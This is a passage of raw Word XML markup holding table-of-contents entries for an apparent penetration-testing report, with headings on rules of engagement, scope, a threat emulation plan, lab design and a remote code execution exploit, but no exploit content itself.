                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:noProof/>
              </w:rPr>
            </w:r>
            <w:r w:rsidRPr="00796916">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidRPr="00796916">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:noProof/>
              </w:rPr>
              <w:t>1</w:t>
            </w:r>
            <w:r w:rsidRPr="00796916">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="4FB4A747" w14:textId="77777777" w:rsidR="00E443CF" w:rsidRPr="00796916" w:rsidRDefault="00E443CF">
          <w:pPr>
            <w:pStyle w:val="TOC2"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="9350"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
              <w:noProof/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc234776718" w:history="1">
            <w:r w:rsidRPr="00796916">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:noProof/>
              </w:rPr>
              <w:t>2.8 Task 1 Conclusion</w:t>
            </w:r>
            <w:r w:rsidRPr="00796916">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:noProof/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00796916">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidRPr="00796916">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:noProof/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc234776718 \h </w:instrText>
            </w:r>
            <w:r w:rsidRPr="00796916">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:noProof/>
              </w:rPr>
            </w:r>
            <w:r w:rsidRPr="00796916">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidRPr="00796916">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:noProof/>
              </w:rPr>
              <w:t>1</w:t>
            </w:r>
            <w:r w:rsidRPr="00796916">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="608227F5" w14:textId="77777777" w:rsidR="00E443CF" w:rsidRPr="00796916" w:rsidRDefault="00E443CF">
          <w:pPr>
            <w:pStyle w:val="TOC1"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="9350"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
              <w:noProof/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc234776719" w:history="1">
            <w:r w:rsidRPr="00796916">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:noProof/>
              </w:rPr>
              <w:t>3 · Task 2 — Red Team Engagement: ABCD Ltd Penetration Test</w:t>
            </w:r>
            <w:r w:rsidRPr="00796916">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:noProof/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00796916">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidRPr="00796916">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:noProof/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc234776719 \h </w:instrText>
            </w:r>
            <w:r w:rsidRPr="00796916">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:noProof/>
              </w:rPr>
            </w:r>
            <w:r w:rsidRPr="00796916">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidRPr="00796916">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:noProof/>
              </w:rPr>
              <w:t>1</w:t>
            </w:r>
            <w:r w:rsidRPr="00796916">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="7C43C1AF" w14:textId="77777777" w:rsidR="00E443CF" w:rsidRPr="00796916" w:rsidRDefault="00E443CF">
          <w:pPr>
            <w:pStyle w:val="TOC2"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="9350"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
              <w:noProof/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc234776720" w:history="1">
            <w:r w:rsidRPr="00796916">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:noProof/>
              </w:rPr>
              <w:t>3.1 Rules of Engagement (RoE)</w:t>
            </w:r>
            <w:r w:rsidRPr="00796916">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:noProof/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00796916">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidRPr="00796916">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:noProof/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc234776720 \h </w:instrText>
            </w:r>
            <w:r w:rsidRPr="00796916">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:noProof/>
              </w:rPr>
            </w:r>
            <w:r w:rsidRPr="00796916">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidRPr="00796916">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:noProof/>
              </w:rPr>
              <w:t>1</w:t>
            </w:r>
            <w:r w:rsidRPr="00796916">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="4E6A550D" w14:textId="77777777" w:rsidR="00E443CF" w:rsidRPr="00796916" w:rsidRDefault="00E443CF">
          <w:pPr>
            <w:pStyle w:val="TOC3"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="9350"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
              <w:noProof/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc234776721" w:history="1">
            <w:r w:rsidRPr="00796916">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Scope — In Scope</w:t>
            </w:r>
            <w:r w:rsidRPr="00796916">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:noProof/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00796916">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidRPr="00796916">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:noProof/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc234776721 \h </w:instrText>
            </w:r>
            <w:r w:rsidRPr="00796916">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:noProof/>
              </w:rPr>
            </w:r>
            <w:r w:rsidRPr="00796916">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidRPr="00796916">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:noProof/>
              </w:rPr>
              <w:t>1</w:t>
            </w:r>
            <w:r w:rsidRPr="00796916">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="604DC4F0" w14:textId="77777777" w:rsidR="00E443CF" w:rsidRPr="00796916" w:rsidRDefault="00E443CF">
          <w:pPr>
            <w:pStyle w:val="TOC3"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="9350"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
              <w:noProof/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc234776722" w:history="1">
            <w:r w:rsidRPr="00796916">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Scope — Explicitly Excluded</w:t>
            </w:r>
            <w:r w:rsidRPr="00796916">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:noProof/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00796916">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidRPr="00796916">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:noProof/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc234776722 \h </w:instrText>
            </w:r>
            <w:r w:rsidRPr="00796916">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:noProof/>
              </w:rPr>
            </w:r>
            <w:r w:rsidRPr="00796916">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidRPr="00796916">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:noProof/>
              </w:rPr>
              <w:t>1</w:t>
            </w:r>
            <w:r w:rsidRPr="00796916">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="228916A3" w14:textId="77777777" w:rsidR="00E443CF" w:rsidRPr="00796916" w:rsidRDefault="00E443CF">
          <w:pPr>
            <w:pStyle w:val="TOC3"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="9350"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
              <w:noProof/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc234776723" w:history="1">
            <w:r w:rsidRPr="00796916">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Permitted Techniques</w:t>
            </w:r>
            <w:r w:rsidRPr="00796916">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:noProof/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00796916">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidRPr="00796916">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:noProof/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc234776723 \h </w:instrText>
            </w:r>
            <w:r w:rsidRPr="00796916">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:noProof/>
              </w:rPr>
            </w:r>
            <w:r w:rsidRPr="00796916">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidRPr="00796916">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:noProof/>
              </w:rPr>
              <w:t>1</w:t>
            </w:r>
            <w:r w:rsidRPr="00796916">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="003630D4" w14:textId="77777777" w:rsidR="00E443CF" w:rsidRPr="00796916" w:rsidRDefault="00E443CF">
          <w:pPr>
            <w:pStyle w:val="TOC3"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="9350"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
              <w:noProof/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc234776724" w:history="1">
            <w:r w:rsidRPr="00796916">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Safety, Communication and Escalation</w:t>
            </w:r>
            <w:r w:rsidRPr="00796916">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:noProof/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00796916">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidRPr="00796916">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:noProof/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc234776724 \h </w:instrText>
            </w:r>
            <w:r w:rsidRPr="00796916">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:noProof/>
              </w:rPr>
            </w:r>
            <w:r w:rsidRPr="00796916">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidRPr="00796916">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:noProof/>
              </w:rPr>
              <w:t>1</w:t>
            </w:r>
            <w:r w:rsidRPr="00796916">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="39FBDEAD" w14:textId="77777777" w:rsidR="00E443CF" w:rsidRPr="00796916" w:rsidRDefault="00E443CF">
          <w:pPr>
            <w:pStyle w:val="TOC2"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="9350"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
              <w:noProof/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc234776725" w:history="1">
            <w:r w:rsidRPr="00796916">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:noProof/>
              </w:rPr>
              <w:t>3.2 Threat Emulation Plan</w:t>
            </w:r>
            <w:r w:rsidRPr="00796916">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:noProof/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00796916">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidRPr="00796916">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:noProof/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc234776725 \h </w:instrText>
            </w:r>
            <w:r w:rsidRPr="00796916">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:noProof/>
              </w:rPr>
            </w:r>
            <w:r w:rsidRPr="00796916">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidRPr="00796916">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:noProof/>
              </w:rPr>
              <w:t>1</w:t>
            </w:r>
            <w:r w:rsidRPr="00796916">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="0E9A6C64" w14:textId="77777777" w:rsidR="00E443CF" w:rsidRPr="00796916" w:rsidRDefault="00E443CF">
          <w:pPr>
            <w:pStyle w:val="TOC2"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="9350"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
              <w:noProof/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc234776726" w:history="1">
            <w:r w:rsidRPr="00796916">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:noProof/>
              </w:rPr>
              <w:t>3.3 Lab Environment Design</w:t>
            </w:r>
            <w:r w:rsidRPr="00796916">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:noProof/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00796916">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidRPr="00796916">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:noProof/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc234776726 \h </w:instrText>
            </w:r>
            <w:r w:rsidRPr="00796916">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:noProof/>
              </w:rPr>
            </w:r>
            <w:r w:rsidRPr="00796916">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidRPr="00796916">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:noProof/>
              </w:rPr>
              <w:t>1</w:t>
            </w:r>
            <w:r w:rsidRPr="00796916">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="553CFC83" w14:textId="77777777" w:rsidR="00E443CF" w:rsidRPr="00796916" w:rsidRDefault="00E443CF">
          <w:pPr>
            <w:pStyle w:val="TOC2"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="9350"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
              <w:noProof/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc234776727" w:history="1">
            <w:r w:rsidRPr="00796916">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:noProof/>
              </w:rPr>
              <w:t>3.4 Exploitation — Three Distinct Exploits</w:t>
            </w:r>
            <w:r w:rsidRPr="00796916">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:noProof/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00796916">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidRPr="00796916">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:noProof/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc234776727 \h </w:instrText>
            </w:r>
            <w:r w:rsidRPr="00796916">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:noProof/>
              </w:rPr>
            </w:r>
            <w:r w:rsidRPr="00796916">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidRPr="00796916">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:noProof/>
              </w:rPr>
              <w:t>1</w:t>
            </w:r>
            <w:r w:rsidRPr="00796916">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="1FB012AC" w14:textId="77777777" w:rsidR="00E443CF" w:rsidRPr="00796916" w:rsidRDefault="00E443CF">
          <w:pPr>
            <w:pStyle w:val="TOC3"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="9350"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
              <w:noProof/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc234776728" w:history="1">
            <w:r w:rsidRPr="00796916">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Exploit A — Remote Code Execution on the Web Application (VM-2)</w:t>
            </w:r>
            <w:r w:rsidRPr="00796916">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:noProof/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00796916">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidRPr="00796916">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:noProof/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc234776728 \h </w:instrText>
            </w:r>
            <w:r w:rsidRPr="00796916">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:noProof/>
              </w:rPr>
            </w:r>
            <w:r w:rsidRPr="00796916">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidRPr="00796916">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:noProof/>
              </w:rPr>
              <w:t>1</w:t>
            </w:r>
            <w:r w:rsidRPr="00796916">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="40C9053C" w14:textId="77777777" w:rsidR="00E443CF" w:rsidRPr="00796916" w:rsidRDefault="00E443CF">
          <w:pPr>
            <w:pStyle w:val="TOC3"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="9350"/>
            </w:tabs>
            <w:rPr>
